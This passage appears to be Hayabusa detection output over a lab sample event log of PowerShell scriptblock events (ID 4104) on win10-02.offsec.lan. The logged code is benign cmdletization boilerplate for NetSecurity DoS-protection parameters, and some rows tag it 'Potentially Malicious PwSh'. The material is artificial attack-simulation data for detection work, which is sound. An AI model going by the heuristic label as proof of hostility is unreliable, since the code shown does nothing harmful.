Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = 
${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = 
${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; 
ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote 
Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType 
= 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmd,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
